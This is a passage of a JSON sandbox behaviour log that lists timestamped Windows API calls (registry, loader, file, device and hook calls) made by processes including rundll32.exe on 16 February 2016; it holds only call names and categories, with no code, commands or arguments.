"RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", 
"timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,030", "api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,030", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegEnumKeyW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 
17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,040", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", 
"timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,040", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,040", "api": "GetSystemMetrics"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,040", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": 
"2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": 
"registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,050", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,050", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,050", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": 
"RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", 
"api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,060", "api": "RegCloseKey"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,060", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,060", "api": "LdrGetProcedureAddress"}, {"category": "windows", "timestamp": "2016-02-16 17:42:08,070", "api": "FindWindowA"}]}, {"parent_id": 1592, "process_name": "rundll32.exe", "process_id": 308, "first_seen": "2016-02-16 17:42:07,930", "calls": [{"category": "filesystem", "timestamp": "2016-02-16 17:42:07,940", "api": "NtOpenFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,940", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,940", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,980", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,980", "api": "NtOpenFile"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrGetDllHandle"}, {"category": "system", 
"timestamp": "2016-02-16 17:42:08,070", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "IsDebuggerPresent"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,070", "api": "LdrLoadDll"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,070", "api": "GetSystemMetrics"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,070", "api": "ZwMapViewOfSection"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,080", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrLoadDll"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "SetWindowsHookExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "SetWindowsHookExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,080", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetDllHandle"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,080", "api": "LdrGetDllHandle"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "synchronization", "timestamp": "2016-02-16 17:42:08,080", "api": "NtOpenMutant"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "NtOpenSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:08,080", "api": "ZwMapViewOfSection"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 
17:42:08,090", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,090", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,090", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,100", "api": "NtOpenKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": 
"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:42:08,100", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetDllHandle"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,100", "api": "DeviceIoControl"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,100", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,100", "api": "RegOpenKeyExW"}, {"category": 
"registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExA"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": 
"registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegQueryValueExW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,110", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LookupPrivilegeValueW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,110", "api": "LookupPrivilegeValueW"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": 
"DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtOpenFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:42:08,120", "api": "LdrGetProcedureAddress"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtQueryInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:08,120", "api": "NtCreateFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:08,120", "api": "DeviceIoControl"}, {"category": "registry", "timestamp": "2016-02-16 17:42:08,120", "api": "RegCreateKeyExW"}, 